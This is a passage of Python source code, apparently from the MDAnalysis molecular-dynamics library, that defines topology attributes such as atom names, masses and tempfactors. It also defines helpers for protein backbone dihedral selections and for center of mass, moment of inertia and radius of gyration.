return ag.ix
def get_residues(self, rg):
return list(self.top.tt.residues2atoms_2d(rg.ix))
def get_segments(self, sg):
return list(self.top.tt.segments2atoms_2d(sg.ix))
class Resindices(TopologyAttr):
"""Globally unique resindices for each residue in the group.
If the group is an AtomGroup, then this gives the resindex for each atom in
the group. This unambiguously determines each atom's residue membership.
Resetting these values changes the residue membership of the atoms.
If the group is a ResidueGroup or SegmentGroup, then this gives the
resindices of each residue represented in the group in a 1-D array, in the
order of the elements in that group.
"""
attrname = 'resindices'
singular = 'resindex'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom, Residue]
dtype = int
def __init__(self):
self._guessed = False
def get_atoms(self, ag):
return self.top.tt.atoms2residues(ag.ix)
def get_residues(self, rg):
return rg.ix
def set_residues(self, rg, values):
raise AttributeError("Residue indices are fixed; they cannot be reset")
def get_segments(self, sg):
return list(self.top.tt.segments2residues_2d(sg.ix))
class Segindices(TopologyAttr):
"""Globally unique segindices for each segment in the group.
If the group is an AtomGroup, then this gives the segindex for each atom in
the group. This unambiguously determines each atom's segment membership.
It is not possible to set these, since membership in a segment is an
attribute of each atom's residue.
If the group is a ResidueGroup or SegmentGroup, then this gives the
segindices of each segment represented in the group in a 1-D array, in the
order of the elements in that group.
"""
attrname = 'segindices'
singular = 'segindex'
dtype = int
target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
Atom, Residue, Segment]
def __init__(self):
self._guessed = False
def get_atoms(self, ag):
return self.top.tt.atoms2segments(ag.ix)
def get_residues(self, rg):
return self.top.tt.residues2segments(rg.ix)
def get_segments(self, sg):
return sg.ix
def set_segments(self, sg, values):
raise AttributeError("Segment indices are fixed; they cannot be reset")
# atom attributes
class AtomAttr(TopologyAttr):
"""Base class for atom attributes.
"""
attrname = 'atomattrs'
singular = 'atomattr'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom]
def get_atoms(self, ag):
return self.values[ag.ix]
@_check_length
def set_atoms(self, ag, values):
self.values[ag.ix] = values
def get_residues(self, rg):
"""By default, the values for each atom present in the set of residues
are returned in a single array. This behavior can be overriden in child
attributes.
"""
aixs = self.top.tt.residues2atoms_2d(rg.ix)
return [self.values[aix] for aix in aixs]
def set_residues(self, rg, values):
raise _wronglevel_error(self, rg)
def get_segments(self, sg):
"""By default, the values for each atom present in the set of residues
are returned in a single array. This behavior can be overriden in child
attributes.
"""
aixs = self.top.tt.segments2atoms_2d(sg.ix)
return [self.values[aix] for aix in aixs]
def set_segments(self, sg, values):
raise _wronglevel_error(self, sg)
# TODO: update docs to property doc
class Atomids(AtomAttr):
"""ID for each atom.
"""
attrname = 'ids'
singular = 'id'
per_object = 'atom'
dtype = int
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.arange(1, na + 1)
class _StringInternerMixin:
"""String interning pattern
Used for faster matching of strings (see _ProtoStringSelection)
self.namedict (dict)
- maps actual string to string index (str->int)
self.namelookup (array dtype object)
- maps string index to actual string (int->str)
self.nmidx (array dtype int)
- maps atom index to string index (int->int)
self.values (array dtype object)
- the premade per-object string values
.. versionadded:: 2.1.0
Mashed together the different implementations to keep it DRY.
"""
def __init__(self, vals, guessed=False):
self._guessed = guessed
self.namedict = dict() # maps str to nmidx
name_lookup = [] # maps idx to str
# eg namedict['O'] = 5 & name_lookup[5] = 'O'
self.nmidx = np.zeros_like(vals, dtype=int) # the lookup for each atom
# eg Atom 5 is 'C', so nmidx[5] = 7, where name_lookup[7] = 'C'
for i, val in enumerate(vals):
try:
self.nmidx[i] = self.namedict[val]
except KeyError:
nextidx = len(self.namedict)
self.namedict[val] = nextidx
name_lookup.append(val)
self.nmidx[i] = nextidx
self.name_lookup = np.array(name_lookup, dtype=object)
self.values = self.name_lookup[self.nmidx]
def _add_new(self, newval):
"""Append new value to the TopologyAttr
Parameters
----------
newval : str
value to append
resizes this attr to size+1 and adds newval as the value of the new entry
for string interning this is slightly different hence the override
.. versionadded:: 2.1.0
"""
try:
newidx = self.namedict[newval]
except KeyError:
newidx = len(self.namedict)
self.namedict[newval] = newidx
self.name_lookup = np.concatenate([self.name_lookup, [newval]])
self.nmidx = np.concatenate([self.nmidx, [newidx]])
self.values = np.concatenate([self.values, [newval]])
def _set_X(self, ag, values):
newnames = []
# two possibilities, either single value given, or one per Atom
if isinstance(values, str):
try:
newidx = self.namedict[values]
except KeyError:
newidx = len(self.namedict)
self.namedict[values] = newidx
newnames.append(values)
else:
newidx = np.zeros_like(values, dtype=int)
for i, val in enumerate(values):
try:
newidx[i] = self.namedict[val]
except KeyError:
nextidx = len(self.namedict)
self.namedict[val] = nextidx
newnames.append(val)
newidx[i] = nextidx
self.nmidx[ag.ix] = newidx # newidx either single value or same size array
if newnames:
self.name_lookup = np.concatenate([self.name_lookup, newnames])
self.values = self.name_lookup[self.nmidx]
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class AtomStringAttr(_StringInternerMixin, AtomAttr):
@_check_length
def set_atoms(self, ag, values):
return self._set_X(ag, values)
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.full(na, '', dtype=object)
# TODO: update docs to property doc
class Atomnames(AtomStringAttr):
"""Name for each atom.
"""
attrname = 'names'
singular = 'name'
per_object = 'atom'
dtype = object
transplants = defaultdict(list)
def phi_selection(residue, c_name='C', n_name='N', ca_name='CA'):
"""Select AtomGroup corresponding to the phi protein backbone dihedral
C'-N-CA-C.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
AtomGroup
4-atom selection in the correct order. If no C' found in the
previous residue (by resid) then this method returns ``None``.
.. versionchanged:: 1.0.0
Added arguments for flexible atom names and refactored code for
faster atom matching with boolean arrays.
"""
# fnmatch is expensive. try the obv candidate first
prev = residue.universe.residues[residue.ix-1]
sid = residue.segment.segid
rid = residue.resid-1
if not (prev.segment.segid == sid and prev.resid == rid):
sel = 'segid {} and resid {}'.format(sid, rid)
try:
prev = residue.universe.select_atoms(sel).residues[0]
except IndexError:
return None
c_ = prev.atoms[prev.atoms.names == c_name]
if not len(c_) == 1:
return None
atnames = residue.atoms.names
ncac_names = [n_name, ca_name, c_name]
ncac = [residue.atoms[atnames == n] for n in ncac_names]
if not all(len(ag) == 1 for ag in ncac):
return None
sel = c_+sum(ncac)
return sel
transplants[Residue].append(('phi_selection', phi_selection))
def phi_selections(residues, c_name='C', n_name='N', ca_name='CA'):
"""Select list of AtomGroups corresponding to the phi protein
backbone dihedral C'-N-CA-C.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
list of AtomGroups
4-atom selections in the correct order. If no C' found in the
previous residue (by resid) then corresponding item in the list
is ``None``.
.. versionadded:: 1.0.0
"""
u = residues[0].universe
prev = u.residues[residues.ix-1] # obv candidates first
rsid = residues.segids
prid = residues.resids-1
ncac_names = [n_name, ca_name, c_name]
sel = 'segid {} and resid {}'
# replace wrong residues
wix = np.where((prev.segids != rsid) | (prev.resids != prid))[0]
invalid = []
if len(wix):
prevls = list(prev)
for s, r, i in zip(rsid[wix], prid[wix], wix):
try:
prevls[i] = u.select_atoms(sel.format(s, r)).residues[0]
except IndexError:
invalid.append(i)
prev = sum(prevls)
keep_prev = [sum(r.atoms.names == c_name) == 1 for r in prev]
keep_res = [all(sum(r.atoms.names == n) == 1 for n in ncac_names)
for r in residues]
keep = np.array(keep_prev) & np.array(keep_res)
keep[invalid] = False
results = np.zeros_like(residues, dtype=object)
results[~keep] = None
prev = prev[keep]
residues = residues[keep]
keepix = np.where(keep)[0]
c_ = prev.atoms[prev.atoms.names == c_name]
n = residues.atoms[residues.atoms.names == n_name]
ca = residues.atoms[residues.atoms.names == ca_name]
c = residues.atoms[residues.atoms.names == c_name]
results[keepix] = [sum(atoms) for atoms in zip(c_, n, ca, c)]
return list(results)
transplants[ResidueGroup].append(('phi_selections', phi_selections))
def psi_selection(residue, c_name='C', n_name='N', ca_name='CA'):
"""Select AtomGroup corresponding to the psi protein backbone dihedral
N-CA-C-N'.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
AtomGroup
4-atom selection in the correct order. If no N' found in the
following residue (by resid) then this method returns ``None``.
.. versionchanged:: 1.0.0
Added arguments for flexible atom names and refactored code for
faster atom matching with boolean arrays.
"""
# fnmatch is expensive. try the obv candidate first
_manual_sel = False
sid = residue.segment.segid
rid = residue.resid+1
try:
nxt = residue.universe.residues[residue.ix+1]
except IndexError:
_manual_sel = True
else:
if not (nxt.segment.segid == sid and nxt.resid == rid):
_manual_sel = True
if _manual_sel:
sel = 'segid {} and resid {}'.format(sid, rid)
try:
nxt = residue.universe.select_atoms(sel).residues[0]
except IndexError:
return None
n_ = nxt.atoms[nxt.atoms.names == n_name]
if not len(n_) == 1:
return None
atnames = residue.atoms.names
ncac_names = [n_name, ca_name, c_name]
ncac = [residue.atoms[atnames == n] for n in ncac_names]
if not all(len(ag) == 1 for ag in ncac):
return None
sel = sum(ncac) + n_
return sel
transplants[Residue].append(('psi_selection', psi_selection))
def _get_next_residues_by_resid(residues):
"""Select list of Residues corresponding to the next resid for each
residue in `residues`.
Returns
-------
List of Residues
List of the next residues in the Universe, by resid and segid.
If not found, the corresponding item in the list is ``None``.
.. versionadded:: 1.0.0
"""
try:
u = residues[0].universe
except IndexError:
return residues
nxres = np.array([None]*len(residues), dtype=object)
ix = np.arange(len(residues))
# no guarantee residues is ordered or unique
last = max(residues.ix)
if last == len(u.residues)-1:
notlast = residues.ix != last
ix = ix[notlast]
residues = residues[notlast]
nxres[ix] = nxt = u.residues[residues.ix+1]
rsid = residues.segids
nrid = residues.resids+1
sel = 'segid {} and resid {}'
# replace wrong residues
wix = np.where((nxt.segids != rsid) | (nxt.resids != nrid))[0]
if len(wix):
for s, r, i in zip(rsid[wix], nrid[wix], wix):
try:
nxres[ix[i]] = u.select_atoms(sel.format(s, r)).residues[0]
except IndexError:
nxres[ix[i]] = None
return nxres
transplants[ResidueGroup].append(('_get_next_residues_by_resid',
_get_next_residues_by_resid))
def _get_prev_residues_by_resid(residues):
"""Select list of Residues corresponding to the previous resid for each
residue in `residues`.
Returns
-------
List of Residues
List of the previous residues in the Universe, by resid and segid.
If not found, the corresponding item in the list is ``None``.
.. versionadded:: 1.0.0
"""
try:
u = residues[0].universe
except IndexError:
return residues
pvres = np.array([None]*len(residues))
pvres[:] = prev = u.residues[residues.ix-1]
rsid = residues.segids
prid = residues.resids-1
sel = 'segid {} and resid {}'
# replace wrong residues
wix = np.where((prev.segids != rsid) | (prev.resids != prid))[0]
if len(wix):
for s, r, i in zip(rsid[wix], prid[wix], wix):
try:
pvres[i] = u.select_atoms(sel.format(s, r)).residues[0]
except IndexError:
pvres[i] = None
return pvres
transplants[ResidueGroup].append(('_get_prev_residues_by_resid',
_get_prev_residues_by_resid))
def psi_selections(residues, c_name='C', n_name='N', ca_name='CA'):
"""Select list of AtomGroups corresponding to the psi protein
backbone dihedral N-CA-C-N'.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
List of AtomGroups
4-atom selections in the correct order. If no N' found in the
following residue (by resid) then the corresponding item in the
list is ``None``.
.. versionadded:: 1.0.0
"""
results = np.array([None]*len(residues), dtype=object)
nxtres = residues._get_next_residues_by_resid()
rix = np.where(nxtres)[0]
nxt = sum(nxtres[rix])
residues = residues[rix]
ncac_names = [n_name, ca_name, c_name]
keep_nxt = [sum(r.atoms.names == n_name) == 1 for r in nxt]
keep_res = [all(sum(r.atoms.names == n) == 1 for n in ncac_names)
for r in residues]
keep = np.array(keep_nxt) & np.array(keep_res)
nxt = nxt[keep]
residues = residues[keep]
keepix = np.where(keep)[0]
n = residues.atoms[residues.atoms.names == n_name]
ca = residues.atoms[residues.atoms.names == ca_name]
c = residues.atoms[residues.atoms.names == c_name]
n_ = nxt.atoms[nxt.atoms.names == n_name]
results[rix[keepix]] = [sum(atoms) for atoms in zip(n, ca, c, n_)]
return list(results)
transplants[ResidueGroup].append(('psi_selections', psi_selections))
def omega_selection(residue, c_name='C', n_name='N', ca_name='CA'):
"""Select AtomGroup corresponding to the omega protein backbone dihedral
CA-C-N'-CA'.
omega describes the -C-N- peptide bond. Typically, it is trans (180
degrees) although cis-bonds (0 degrees) are also occasionally observed
(especially near Proline).
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
AtomGroup
4-atom selection in the correct order. If no C' found in the
previous residue (by resid) then this method returns ``None``.
.. versionchanged:: 1.0.0
Added arguments for flexible atom names and refactored code for
faster atom matching with boolean arrays.
"""
# fnmatch is expensive. try the obv candidate first
_manual_sel = False
sid = residue.segment.segid
rid = residue.resid+1
try:
nxt = residue.universe.residues[residue.ix+1]
except IndexError:
_manual_sel = True
else:
if not (nxt.segment.segid == sid and nxt.resid == rid):
_manual_sel = True
if _manual_sel:
sel = 'segid {} and resid {}'.format(sid, rid)
try:
nxt = residue.universe.select_atoms(sel).residues[0]
except IndexError:
return None
ca = residue.atoms[residue.atoms.names == ca_name]
c = residue.atoms[residue.atoms.names == c_name]
n_ = nxt.atoms[nxt.atoms.names == n_name]
ca_ = nxt.atoms[nxt.atoms.names == ca_name]
if not all(len(ag) == 1 for ag in [ca_, n_, ca, c]):
return None
return ca+c+n_+ca_
transplants[Residue].append(('omega_selection', omega_selection))
def omega_selections(residues, c_name='C', n_name='N', ca_name='CA'):
"""Select list of AtomGroups corresponding to the omega protein
backbone dihedral CA-C-N'-CA'.
omega describes the -C-N- peptide bond. Typically, it is trans (180
degrees) although cis-bonds (0 degrees) are also occasionally observed
(especially near Proline).
Parameters
----------
c_name: str (optional)
name for the backbone C atom
n_name: str (optional)
name for the backbone N atom
ca_name: str (optional)
name for the alpha-carbon atom
Returns
-------
List of AtomGroups
4-atom selections in the correct order. If no C' found in the
previous residue (by resid) then the corresponding item in the
list is ``None``.
.. versionadded:: 1.0.0
"""
results = np.array([None]*len(residues), dtype=object)
nxtres = residues._get_next_residues_by_resid()
rix = np.where(nxtres)[0]
nxt = sum(nxtres[rix])
residues = residues[rix]
nxtatoms = [ca_name, n_name]
resatoms = [ca_name, c_name]
keep_nxt = [all(sum(r.atoms.names == n) == 1 for n in nxtatoms)
for r in nxt]
keep_res = [all(sum(r.atoms.names == n) == 1 for n in resatoms)
for r in residues]
keep = np.array(keep_nxt) & np.array(keep_res)
nxt = nxt[keep]
residues = residues[keep]
keepix = np.where(keep)[0]
c = residues.atoms[residues.atoms.names == c_name]
ca = residues.atoms[residues.atoms.names == ca_name]
n_ = nxt.atoms[nxt.atoms.names == n_name]
ca_ = nxt.atoms[nxt.atoms.names == ca_name]
results[rix[keepix]] = [sum(atoms) for atoms in zip(ca, c, n_, ca_)]
return list(results)
transplants[ResidueGroup].append(('omega_selections', omega_selections))
def chi1_selection(residue, n_name='N', ca_name='CA', cb_name='CB',
cg_name='CG CG1 OG OG1 SG'):
r"""Select AtomGroup corresponding to the chi1 sidechain dihedral ``N-CA-CB-*G.``
The gamma atom is taken to be the heavy atom in the gamma position. If more than one
heavy atom is present (e.g. CG1 and CG2), the one with the lower number is used (CG1).
.. warning::
This numbering of chi1 atoms here in following with the IUPAC 1970 rules.
However, it should be noted that analyses which use dihedral angles may have
different definitions. For example, the
:class:`MDAnalysis.analysis.dihedrals.Janin` class does not incorporate
amino acids where the gamma atom is not carbon, into its chi1 selections.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
ca_name: str (optional)
name for the alpha-carbon atom
cb_name: str (optional)
name for the beta-carbon atom
cg_name: str (optional)
name for the gamma-carbon atom
Returns
-------
AtomGroup
4-atom selection in the correct order. If no CB and/or CG is found
then this method returns ``None``.
.. versionadded:: 0.7.5
.. versionchanged:: 1.0.0
Added arguments for flexible atom names and refactored code for
faster atom matching with boolean arrays.
"""
names = [n_name, ca_name, cb_name, cg_name]
ags = [residue.atoms.select_atoms(f"name {n}") for n in names]
if any(len(ag) != 1 for ag in ags):
return None
return sum(ags)
transplants[Residue].append(('chi1_selection', chi1_selection))
def chi1_selections(residues, n_name='N', ca_name='CA', cb_name='CB',
cg_name='CG'):
"""Select list of AtomGroups corresponding to the chi1 sidechain dihedral
N-CA-CB-CG.
Parameters
----------
c_name: str (optional)
name for the backbone C atom
ca_name: str (optional)
name for the alpha-carbon atom
cb_name: str (optional)
name for the beta-carbon atom
cg_name: str (optional)
name for the gamma-carbon atom
Returns
-------
List of AtomGroups
4-atom selections in the correct order. If no CB and/or CG is found
then the corresponding item in the list is ``None``.
.. versionadded:: 1.0.0
"""
results = np.array([None]*len(residues))
names = [n_name, ca_name, cb_name, cg_name]
keep = [all(sum(r.atoms.names == n) == 1 for n in names)
for r in residues]
keepix = np.where(keep)[0]
residues = residues[keep]
atnames = residues.atoms.names
ags = [residues.atoms[atnames == n] for n in names]
results[keepix] = [sum(atoms) for atoms in zip(*ags)]
return list(results)
transplants[ResidueGroup].append(('chi1_selections', chi1_selections))
# TODO: update docs to property doc
class Atomtypes(AtomStringAttr):
"""Type for each atom"""
attrname = 'types'
singular = 'type'
per_object = 'atom'
dtype = object
# TODO: update docs to property doc
class Elements(AtomStringAttr):
"""Element for each atom"""
attrname = 'elements'
singular = 'element'
dtype = object
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.array(['' for _ in range(na)], dtype=object)
# TODO: update docs to property doc
class Radii(AtomAttr):
"""Radii for each atom"""
attrname = 'radii'
singular = 'radius'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class RecordTypes(AtomStringAttr):
"""For PDB-like formats, indicates if ATOM or HETATM
Defaults to 'ATOM'
.. versionchanged:: 0.20.0
Now stores array of dtype object rather than boolean mapping
"""
attrname = 'record_types'
singular = 'record_type'
per_object = 'atom'
dtype = object
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.array(['ATOM'] * na, dtype=object)
class ChainIDs(AtomStringAttr):
"""ChainID per atom
Note
----
This is an attribute of the Atom, not Residue or Segment
"""
attrname = 'chainIDs'
singular = 'chainID'
per_object = 'atom'
dtype = object
class Tempfactors(AtomAttr):
"""Tempfactor for atoms"""
attrname = 'tempfactors'
singular = 'tempfactor'
per_object = 'atom'
dtype = float
transplants = defaultdict(list)
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
# TODO: remove bfactors in 3.0
@deprecate_bfactor_warning
def bfactor(self):
"""Alias for tempfactor
The bfactor topology attribute is only
provided as an alias to the tempfactor
attribute. It will be removed in
3.0. Please use the tempfactor attribute
instead.
.. versionadded:: 2.0.0
.. deprecated:: 2.0.0
Will be removed in 3.0.0. Use the
``tempfactor`` attribute instead.
"""
return self.universe.atoms[self.ix].tempfactor
@deprecate_bfactor_warning
def bfactor_setter(self, value):
"""Tempfactor alias property for atom
.. versionadded:: 2.0.0
"""
self.universe.atoms[self.ix].tempfactor = value
@deprecate_bfactor_warning
def bfactors(self):
"""Alias for tempfactors
The bfactor topology attribute is only
provided as an alias to the tempfactor
attribute. It will be removed in
3.0. Please use the tempfactor attribute
instead.
.. versionadded:: 2.0.0
.. deprecated:: 2.0.0
Will be removed in 3.0.0. Use the
``tempfactor`` attribute instead.
"""
return self.universe.atoms[self.atoms.ix].tempfactors
@deprecate_bfactor_warning
def bfactors_setter(self, value):
"""Tempfactor alias property for groups of atoms
.. versionadded:: 2.0.0
"""
self.universe.atoms[self.atoms.ix].tempfactors = value
transplants[Atom].append(
('bfactor', property(bfactor, bfactor_setter, None,
bfactor.__doc__)))
for group in (AtomGroup, Residue, ResidueGroup, Segment, SegmentGroup):
transplants[group].append(
("bfactors", property(bfactors, bfactors_setter, None,
bfactors.__doc__)))
class Masses(AtomAttr):
attrname = 'masses'
singular = 'mass'
per_object = 'atom'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
Atom, Residue, Segment]
transplants = defaultdict(list)
dtype = np.float64
groupdoc = """Mass of each component in the Group.
If the Group is an AtomGroup, then the masses are for each atom. If the
Group is a ResidueGroup or SegmentGroup, the masses are for each residue or
segment, respectively. These are obtained by summation of the member atoms
for each component.
"""
singledoc = """Mass of the component."""
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
def get_residues(self, rg):
resatoms = self.top.tt.residues2atoms_2d(rg.ix)
if isinstance(rg._ix, numbers.Integral):
# for a single residue
masses = self.values[tuple(resatoms)].sum()
else:
# for a residuegroup
masses = np.empty(len(rg))
for i, row in enumerate(resatoms):
masses[i] = self.values[row].sum()
return masses
def get_segments(self, sg):
segatoms = self.top.tt.segments2atoms_2d(sg.ix)
if isinstance(sg._ix, numbers.Integral):
# for a single segment
masses = self.values[tuple(segatoms)].sum()
else:
# for a segmentgroup
masses = np.array([self.values[row].sum() for row in segatoms])
return masses
@warn_if_not_unique
@_pbc_to_wrap
@check_wrap_and_unwrap
def center_of_mass(group, wrap=False, unwrap=False, compound='group'):
"""Center of mass of (compounds of) the group.
Computes the center of mass of :class:`Atoms<Atom>` in the group.
Centers of mass per :class:`Residue`, :class:`Segment`, molecule, or
fragment can be obtained by setting the `compound` parameter
accordingly. If the masses of a compound sum up to zero, the
center of mass coordinates of that compound will be ``nan`` (not a
number).
Parameters
----------
wrap : bool, optional
If ``True`` and `compound` is ``'group'``, move all atoms to the
primary unit cell before calculation.
If ``True`` and `compound` is not ``group``, the
centers of mass of each compound will be calculated without moving
any atoms to keep the compounds intact. Instead, the resulting
center-of-mass position vectors will be moved to the primary unit
cell after calculation.
unwrap : bool, optional
If ``True``, compounds will be unwrapped before computing their
centers.
compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
optional
If ``'group'``, the center of mass of all atoms in the group will
be returned as a single position vector. Otherwise, the centers of
mass of each :class:`Segment`, :class:`Residue`, molecule, or
fragment will be returned as an array of position vectors, i.e. a 2d
array.
Note that, in any case, *only* the positions of :class:`Atoms<Atom>`
*belonging to the group* will be taken into account.
Returns
-------
center : numpy.ndarray
Position vector(s) of the center(s) of mass of the group.
If `compound` was set to ``'group'``, the output will be a single
position vector.
If `compound` was set to ``'segments'`` or ``'residues'``, the
output will be a 2d coordinate array of shape ``(n, 3)`` where ``n``
is the number of compounds.
Note
----
This method can only be accessed if the underlying topology has
information about atomic masses.
.. versionchanged:: 0.8
Added `pbc` parameter
.. versionchanged:: 0.19.0
Added `compound` parameter
.. versionchanged:: 0.20.0
Added ``'molecules'`` and ``'fragments'`` compounds;
added `unwrap` parameter
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
"""
atoms = group.atoms
return atoms.center(weights=atoms.masses, wrap=wrap, compound=compound,
unwrap=unwrap)
transplants[GroupBase].append(
('center_of_mass', center_of_mass))
@warn_if_not_unique
def total_mass(group, compound='group'):
r"""Total mass of (compounds of) the group.
Computes the total mass of :class:`Atoms<Atom>` in the group.
Total masses per :class:`Residue`, :class:`Segment`, molecule, or
fragment can be obtained by setting the `compound` parameter
accordingly.
Parameters
----------
compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
optional
If ``'group'``, the total mass of all atoms in the group will be
returned as a single value. Otherwise, the total masses per
:class:`Segment`, :class:`Residue`, molecule, or fragment will be
returned as a 1d array.
Note that, in any case, *only* the masses of :class:`Atoms<Atom>`
*belonging to the group* will be taken into account.
Returns
-------
float or numpy.ndarray
Total mass of (compounds of) the group.
If `compound` was set to ``'group'``, the output will be a single
value. Otherwise, the output will be a 1d array of shape ``(n,)``
where ``n`` is the number of compounds.
.. versionchanged:: 0.20.0 Added `compound` parameter
"""
return group.accumulate("masses", compound=compound)
transplants[GroupBase].append(
('total_mass', total_mass))
@warn_if_not_unique
@_pbc_to_wrap
@check_wrap_and_unwrap
def moment_of_inertia(group, wrap=False, unwrap=False, compound="group"):
r"""Moment of inertia tensor relative to center of mass.
Parameters
----------
wrap : bool, optional
If ``True`` and `compound` is ``'group'``, move all atoms to the
primary unit cell before calculation.
If ``True`` and `compound` is not ``group``, the
centers of mass of each compound will be calculated without moving
any atoms to keep the compounds intact. Instead, the resulting
center-of-mass position vectors will be moved to the primary unit
cell after calculation.
unwrap : bool, optional
If ``True``, compounds will be unwrapped before computing their
centers and tensor of inertia.
compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
optional
`compound` determines the behavior of `wrap`.
Note that, in any case, *only* the positions of :class:`Atoms<Atom>`
*belonging to the group* will be taken into account.
Returns
-------
moment_of_inertia : numpy.ndarray
Moment of inertia tensor as a 3 x 3 numpy array.
Notes
-----
The moment of inertia tensor :math:`\mathsf{I}` is calculated for a group of
:math:`N` atoms with coordinates :math:`\mathbf{r}_i,\ 1 \le i \le N`
relative to its center of mass from the relative coordinates
.. math::
\mathbf{r}'_i = \mathbf{r}_i - \frac{1}{\sum_{i=1}^{N} m_i} \sum_{i=1}^{N} m_i \mathbf{r}_i
as
.. math::
\mathsf{I} = \sum_{i=1}^{N} m_i \Big[(\mathbf{r}'_i\cdot\mathbf{r}'_i) \sum_{\alpha=1}^{3}
\hat{\mathbf{e}}_\alpha \otimes \hat{\mathbf{e}}_\alpha - \mathbf{r}'_i \otimes \mathbf{r}'_i\Big]
where :math:`\hat{\mathbf{e}}_\alpha` are Cartesian unit vectors, or in Cartesian coordinates
.. math::
I_{\alpha,\beta} = \sum_{k=1}^{N} m_k
\Big(\big(\sum_{\gamma=1}^3 (x'^{(k)}_{\gamma})^2 \big)\delta_{\alpha,\beta}
- x'^{(k)}_{\alpha} x'^{(k)}_{\beta} \Big).
where :math:`x'^{(k)}_{\alpha}` are the Cartesian coordinates of the
relative coordinates :math:`\mathbf{r}'_k`.
.. versionchanged:: 0.8
Added `pbc` keyword
.. versionchanged:: 0.20.0
Added `unwrap` parameter
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
"""
atomgroup = group.atoms
com = atomgroup.center_of_mass(
wrap=wrap, unwrap=unwrap, compound=compound)
if compound != 'group':
com = (com * group.masses[:, None]
).sum(axis=0) / group.masses.sum()
if wrap:
pos = atomgroup.pack_into_box(inplace=False) - com
elif unwrap:
pos = atomgroup.unwrap(compound=compound, inplace=False) - com
else:
pos = atomgroup.positions - com
masses = atomgroup.masses
# Create the inertia tensor
# m_i = mass of atom i
# (x_i, y_i, z_i) = pos of atom i
# Ixx = sum(m_i*(y_i^2+z_i^2));
# Iyy = sum(m_i*(x_i^2+z_i^2));
# Izz = sum(m_i*(x_i^2+y_i^2))
# Ixy = Iyx = -1*sum(m_i*x_i*y_i)
# Ixz = Izx = -1*sum(m_i*x_i*z_i)
# Iyz = Izy = -1*sum(m_i*y_i*z_i)
tens = np.zeros((3, 3), dtype=np.float64)
# xx
tens[0][0] = (masses * (pos[:, 1] ** 2 + pos[:, 2] ** 2)).sum()
# xy & yx
tens[0][1] = tens[1][0] = - (masses * pos[:, 0] * pos[:, 1]).sum()
# xz & zx
tens[0][2] = tens[2][0] = - (masses * pos[:, 0] * pos[:, 2]).sum()
# yy
tens[1][1] = (masses * (pos[:, 0] ** 2 + pos[:, 2] ** 2)).sum()
# yz + zy
tens[1][2] = tens[2][1] = - (masses * pos[:, 1] * pos[:, 2]).sum()
# zz
tens[2][2] = (masses * (pos[:, 0] ** 2 + pos[:, 1] ** 2)).sum()
return tens
transplants[GroupBase].append(
('moment_of_inertia', moment_of_inertia))
@warn_if_not_unique
@_pbc_to_wrap
def radius_of_gyration(group, wrap=False, **kwargs):
"""Radius of gyration.
Parameters
----------
wrap : bool, optional
If ``True``, move all atoms within the primary unit cell before
calculation. [``False``]
.. versionchanged:: 0.8
Added `pbc` keyword
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
"""
atomgroup = group.atoms
masses = atomgroup.masses
com = atomgroup.center_of_mass(wrap=wrap)
if wrap:
recenteredpos = atomgroup.pack_into_box(inplace=False) - com
else:
recenteredpos = atomgroup.positions - com
rog_sq = np.sum(masses * np.sum(recenteredpos**2,
axis=1)) / atomgroup.total_mass()
return np.sqrt(rog_sq)
transplants[GroupBase].append(
('radius_of_gyration', radius_of_gyration))
@warn_if_not_unique
@_pbc_to_wrap
def shape_parameter(group, wrap=False):
"""Shape parameter.
See [Dima2004a]_ for background information.
Parameters
----------
wrap : bool, optional
If ``True``, move all atoms within the primary unit cell before
calculation. [``False``]
.. versionadded:: 0.7.7
.. versionchanged:: 0.8
Added `pbc` keyword
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
Superfluous kwargs were removed.
"""
atomgroup = group.atoms
masses = atomgroup.masses
com = atomgroup.center_of_mass(wrap=wrap)
if wrap:
recenteredpos = atomgroup.pack_into_box(inplace=False) - com
else:
recenteredpos = atomgroup.positions - com
tensor = np.zeros((3, 3))
for x in range(recenteredpos.shape[0]):
tensor += masses[x] * np.outer(recenteredpos[x, :],
recenteredpos[x, :])
tensor /= atomgroup.total_mass()
eig_vals = np.linalg.eigvalsh(tensor)
shape = 27.0 * np.prod(eig_vals - np.mean(eig_vals)
) / np.power(np.sum(eig_vals), 3)
return shape
transplants[GroupBase].append(
('shape_parameter', shape_parameter))
@warn_if_not_unique
@_pbc_to_wrap
@check_wrap_and_unwrap
def asphericity(group, wrap=False, unwrap=None, compound='group'):
